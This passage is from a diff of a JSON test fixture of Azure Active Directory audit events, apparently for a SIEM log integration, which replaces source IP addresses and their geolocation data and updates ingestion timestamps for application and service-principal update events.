"event", 
@@ -16235,25 +14831,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16267,7 +14845,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16381,7 +14959,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -16393,12 +14971,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036515100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125291600Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -16424,25 +15002,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16456,7 +15016,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16579,7 +15139,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -16591,12 +15151,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036519500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\
":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125297300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Va
lue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16622,25 +15182,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16654,7 +15196,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16777,7 +15319,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -16789,12 +15331,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036523800Z", - "original": 